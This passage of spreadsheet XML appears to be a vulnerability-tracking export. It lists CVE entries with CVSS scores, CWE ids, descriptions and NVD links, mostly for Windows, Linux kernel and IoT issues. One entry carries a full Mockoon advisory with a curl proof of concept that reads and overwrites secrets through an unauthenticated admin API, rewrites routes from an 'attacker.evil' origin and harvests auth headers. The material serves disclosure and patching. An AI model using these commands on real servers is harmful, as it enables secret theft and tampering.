      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr"/>
      <c r="Q572" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr"/>
      <c r="Q573" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70573</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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74" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr"/>
      <c r="Q574" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70573</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70577</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr"/>
      <c r="Q575" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70577</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77905</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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76" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr"/>
      <c r="Q576" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77905</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78457</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K577" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr"/>
      <c r="Q577" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr"/>
      <c r="Q578" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85083</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr"/>
      <c r="Q579" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>The ANJIA AJL33PC0801 IP camera uses a hard-coded credential for bootloader authentication. An attacker with physical access to the device may leverage this weakness to gain privileged bootloader access, allowing unauthorized modification of firmware and system configuration and potentially resulting in complete device compromise.</t>
        </is>
      </c>
      <c r="S579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85083</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89456</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr"/>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/dasd: Propagate partial completion length across ERP recovery
dasd_default_erp_postaction() copies the timing and device state from
the finished ERP request back to the original request but drops
proc_bytes. A request that was partially completed, an ESE read of a
not-yet-allocated track returns fewer bytes than requested, and then
recovered through the ERP chain loses its partial-completion length.
__dasd_cleanup_cqr() then sees proc_bytes == 0 and completes the whole
request instead of requeueing the remainder, silently returning zeroed
data for the part that was never read.
Carry proc_bytes over to the original request like the other
per-request state.</t>
        </is>
      </c>
      <c r="S580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89456</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89459</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr"/>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/percpu: Fix MVIY_PERCPU() with older binutils
Commit a737737cdb9c ("s390/percpu: Infrastructure for more efficient
this_cpu operations") introduced MVIY_PERCPU(), which stringifies
arguments that are already C string literals. This generates an
assembler macro invocation with whitespace-separated quoted arguments:
  GEN_MVIY "459712" "%r3"
GNU as versions prior to binutils 2.39 drop the separating whitespace
between quoted macro arguments during input scrubbing. They
consequently parse the invocation as a single argument and emit
repeated warnings:
  Warning: missing closing `"'
The .ifc in GEN_MVIY never matches and GNU as exits successfully
without emitting the mviy instruction. As a result, the interrupted
per-CPU sequence is not marked in lowcore and the exception return
path cannot repair the per-CPU address register after migration.
All MVIY_PERCPU() callers pass C string literals. Use them directly
and separate the assembler macro arguments with an explicit comma. The
resulting invocation is:
  GEN_MVIY 459712, %r3
This form is unambiguous for GNU as and LLVM's integrated assembler.
This behavior was fixed in GNU as from binutils 2.39, but Linux
supports binutils 2.30.</t>
        </is>
      </c>
      <c r="S581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89459</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59148</t>
        </is>
      </c>
      <c r="D582" s="5" t="inlineStr"/>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr">
        <is>
          <t>npm:@mockoon/cli, npm:@mockoon/commons-server</t>
        </is>
      </c>
      <c r="M582" s="5" t="inlineStr">
        <is>
          <t>9.7.0</t>
        </is>
      </c>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr"/>
      <c r="P582" s="5" t="inlineStr"/>
      <c r="Q582" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-732, CWE-942</t>
        </is>
      </c>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>## Summary
Mockoon's admin API ([`commons-server/src/libs/server/admin-api.ts`](https://github.com/mockoon/mockoon/blob/4375a8f/packages/commons-server/src/libs/server/admin-api.ts)) is mounted on the same Express listener as the user-defined mock routes, **enabled by default** in every shipped runtime (commons-server, CLI, serverless), serves **`Access-Control-Allow-Origin: *` on every endpoint with all HTTP methods allowed including PUT/POST/PATCH/DELETE/PURGE and `Content-Type` in `Access-Control-Allow-Headers`**, and has **zero authentication of any kind** (no token, no shared secret, no `MOCKOON_ADMIN_TOKEN` env var — searched the repo, returns zero hits).
Any unauthenticated caller who can reach the mock server's port (default `0.0.0.0:3000`) can:
- Read every `MOCKOON_*` env var used by the operator as secret material in templates (`getEnvVar` helper).
- **Write arbitrary process env vars (no prefix check on the WRITE path)** — poison operator's `MOCKOON_API_KEY`, `MOCKOON_JWT_SECRET`, …, or write process-level vars like `AWS_SECRET_ACCESS_KEY` that the surrounding runtime consumes.
- **Rewrite every mock route's body / status / headers in-runtime** via `PUT /mockoon-admin/environment` — downstream consumers (frontend dev-server, CI test suite, integration partner) receive attacker-controlled responses and headers including `Set-Cookie`, `Location`, `Content-Security-Policy`, etc.
- Read transaction logs / SSE stream (consumer's request bodies + auth headers in clear).
- Read/write global template vars; purge state / data buckets / logs.
Because of the wildcard CORS reply, the attack **also lands cross-origin from a browser**: a developer who runs `mockoon-cli start ...` locally and visits a malicious website gets their mock state hijacked.
---
## Details
### Root cause
`packages/commons-server/src/libs/server/server.ts:127`:
```ts
private options: ServerOptions = {
  ...,
  enableAdminApi: true,        // ← default on
};
```
`packages/cli/src/commands/start.ts:200`:
```ts
enableAdminApi: !userFlags['disable-admin-api'],   // default true unless --disable-admin-api passed
```
`packages/serverless/src/libs/serverless.ts:21`:
```ts
enableAdminApi: true,          // ← default on, no flag to disable in the constructor
```
`packages/commons-server/src/libs/server/admin-api.ts:63-74` (permissive CORS on every admin endpoint):
```ts
app.use(`${adminApiPrefix}*`, (req, res, next) =&gt; {
  res.setHeaders(
    new Headers({
      'Access-Control-Allow-Origin': '*',
      'Access-Control-Allow-Methods':
        'GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS',
      'Access-Control-Allow-Headers':
        'Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With'
    })
  );
  next();
});
```
`packages/commons-server/src/libs/server/admin-api.ts:151-166` (no auth, no prefix check on WRITE):
```ts
const setEnvVarHandler = (req, res) =&gt; {
  try {
    const { key, value } = req.body;
    if (key !== undefined &amp;&amp; value !== undefined) {
      process.env[key] = value;                            // ← any process env, any value
      res.send({ message: `Environment variable '${key}' has been set to '${value}'` });
    } else {
      throw new Error('Key or value missing from request');
    }
  } catch (_error) {
    res.status(400).send({ message: 'Invalid request' });
  }
};
```
`packages/commons-server/src/libs/server/admin-api.ts:373-393` (the most impactful — runtime mock rewrite):
```ts
app.put(`${adminApiPrefix}/environment`, (req, res) =&gt; {
  try {
    const environment: Environment = EnvironmentSchema.validate(req.body).value;
    if (!environment) {
      res.status(400).send({ message: 'Invalid environment format' });
      return;
    }
    updateEnvironment(environment);                        // ← runtime mutation of every route response
    res.send({ message: 'Environment updated' });
  } catch (_error) {
    res.status(400).send({ message: 'Invalid environment format' });
  }
});
```
Default `hostname: ''` (`packages/commons/src/constants/environment-schema.constants.ts:33`) → Node binds `0.0.0.0`/`::` (confirmed via `lsof`). Migration #16 (`packages/commons/src/libs/migrations.ts:343`) also forces missing hostnames to `'0.0.0.0'`.
---
## PoC
### Live reproduction (2026-05-11, `@mockoon/cli@9.6.1`)
`npm install @mockoon/cli@9.6.1`. Minimal `env.json` with one route `GET /users/:id` whose response templates `{{getEnvVar 'MOCKOON_API_KEY'}}`. Start with:
```
MOCKOON_API_KEY="sk-operator-real-secret-DO_NOT_LEAK_xyz789" \
  mockoon-cli start --data env.json --port 3100 --repair --disable-log-to-file
```
Bind confirmed via `lsof`:
```
COMMAND  PID    USER  FD  TYPE  ...  NAME
node    39906  ...   14u  IPv6  ...  TCP *:3100 (LISTEN)    &lt;-- all interfaces
```
Baseline mock response:
```
$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}
```
#### 1) Read operator secret unauth
```
$ curl -s -i http://127.0.0.1:3100/mockoon-admin/env-vars/API_KEY
HTTP/1.1 200 OK
access-control-allow-origin: *
{"key":"MOCKOON_API_KEY","value":"sk-operator-real-secret-DO_NOT_LEAK_xyz789"}
```
#### 2) Poison operator secret unauth → downstream consumer ingests attacker value
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-POISONED-BY-ATTACKER"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-POISONED-BY-ATTACKER'"}
$ curl -s http://127.0.0.1:3100/users/42
{"id":"42","name":"BENIGN_ALICE","role":"user","apiKey":"sk-POISONED-BY-ATTACKER"}
```
#### 3) Write arbitrary non-`MOCKOON_*` env var (no prefix gate)
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Content-Type: application/json" \
    -d '{"key":"AWS_SECRET_ACCESS_KEY","value":"overwritten-by-attacker"}'
{"message":"Environment variable 'AWS_SECRET_ACCESS_KEY' has been set to 'overwritten-by-attacker'"}
```
#### 4) Cross-origin CSRF from `https://attacker.evil`
```
$ curl -s -i -X OPTIONS http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Access-Control-Request-Method: POST" \
    -H "Access-Control-Request-Headers: Content-Type"
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS
Access-Control-Allow-Headers: Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/env-vars \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{"key":"MOCKOON_API_KEY","value":"sk-EXFIL-FROM-attacker.evil"}'
{"message":"Environment variable 'MOCKOON_API_KEY' has been set to 'sk-EXFIL-FROM-attacker.evil'"}
```
Wildcard `Access-Control-Allow-Origin: *` + `Access-Control-Allow-Methods` covering PUT/POST/PATCH + `Content-Type` in `Access-Control-Allow-Headers` mean the browser preflight passes for non-simple JSON POSTs. A developer who visits a malicious site while their Mockoon CLI is running is fully exploitable from JavaScript.
#### 5) Rewrite every mock route via unauth `PUT /environment`
```
$ curl -s -X PUT http://127.0.0.1:3100/mockoon-admin/environment \
    -H "Origin: https://attacker.evil" \
    -H "Content-Type: application/json" \
    -d '{ ...full env JSON with route response rewritten to body "ATTACKER_PWNED",
          statusCode 418, header X-Pwned: by-attacker.evil... }'
{"message":"Environment updated"}
$ curl -s -i http://127.0.0.1:3100/users/99
HTTP/1.1 418 I'm a Teapot
X-Pwned: by-attacker.evil
Content-Type: application/json
{"id":"99","name":"ATTACKER_PWNED","role":"admin","backdoor":true}
```
#### 6) Read transaction logs / SSE stream → harvest consumer's auth headers
```
$ curl -s http://127.0.0.1:3100/mockoon-admin/logs?limit=2
```
Each log entry includes consumer's `request.headers` (Authorization / Cookie / X-API-Key), `request.body`, `request.urlPath`, and the response served back — continuous info-disclosure of every API call the legitimate consumer makes against the mock. `GET /mockoon-admin/events` streams the same data live via SSE.
#### 7) Purge state (DoS)
```
$ curl -s -X POST http://127.0.0.1:3100/mockoon-admin/state/purge
{"response":"Server has been reset to its initial state"}
```
---
## Impact
In typical local-dev mode (CVSS 8.8 High):
- Secret read of every `MOCKOON_*` env var (API keys, JWT signing keys, OAuth client secrets).
- Secret write to any `process.env` key — poison operator's secrets, swap AWS/SDK creds.
- Runtime rewrite of every mock route's body / status / headers → downstream consumer ingests attacker-controlled data + headers (Set-Cookie, Location, CSP).
- Auth-token harvesting via transaction logs / SSE stream.
- State purge / DoS.
In network-exposed deployment (CVSS 9.4 Critical):
- All of the above without user interaction. The serverless wrapper hardcodes `enableAdminApi: true`; `mockoon/cli` Docker image inherits the same default and is commonly deployed in shared CI / staging environments.
---
## Suggested fix
1. Require explicit authentication on the admin API by default. Print an auto-generated bearer token on CLI startup (Jupyter-style), keyed off `MOCKOON_ADMIN_TOKEN` env var, compared with `crypto.timingSafeEqual`.
2. Stop sending `Access-Control-Allow-Origin: *` on admin endpoints. Default: no CORS at all (browser will block cross-origin reads). Operators who run a separate admin UI on another origin can opt-in with `--admin-api-origin`.
3. Bind the admin API to loopback by default, on a separate port or behind a remote-address check.
4. Add a prefix check on the `setEnvVarHandler` matching the prepend behavior on the GET handler — reject any `key` that doesn't start with `envVarsPrefix`.
5. Add `SECURITY.md` with disclosure instructions.
6. Ship `@mockoon/serverless` and `mockoon/cli` Docker image with `enableAdminApi: false` by default; opt-in via flag.</t>
        </is>
      </c>
      <c r="S582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59148</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59151</t>
        </is>
      </c>
      <c r="D583" s="5" t="inlineStr"/>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr"/>
      <c r="L583" s="5" t="inlineStr">
        <is>
          <t>pip:prowler-cloud</t>
        </is>
      </c>
      <c r="M583" s="5" t="inlineStr">
        <is>
          <t>5.30.3</t>
        </is>
      </c>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr"/>
      <c r="P583" s="5" t="inlineStr"/>
      <c r="Q583" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>## SAML Tenant Binding Enables Cross-Tenant Account Takeover
### Summary
Prowler's SAML authentication flow trusted the email domain asserted in a SAMLResponse when deciding which tenant should receive the final token. A malicious tenant with its own SAML configuration and a self-controlled IdP could complete a valid SAML flow for its own configured domain, while asserting an email address from another configured domain.
In the vulnerable flow, the ACS finish logic later derived the tenant from the asserted email domain instead of binding token issuance to the tenant associated with the validated SAML configuration. This could cause a token to be issued for the wrong tenant.
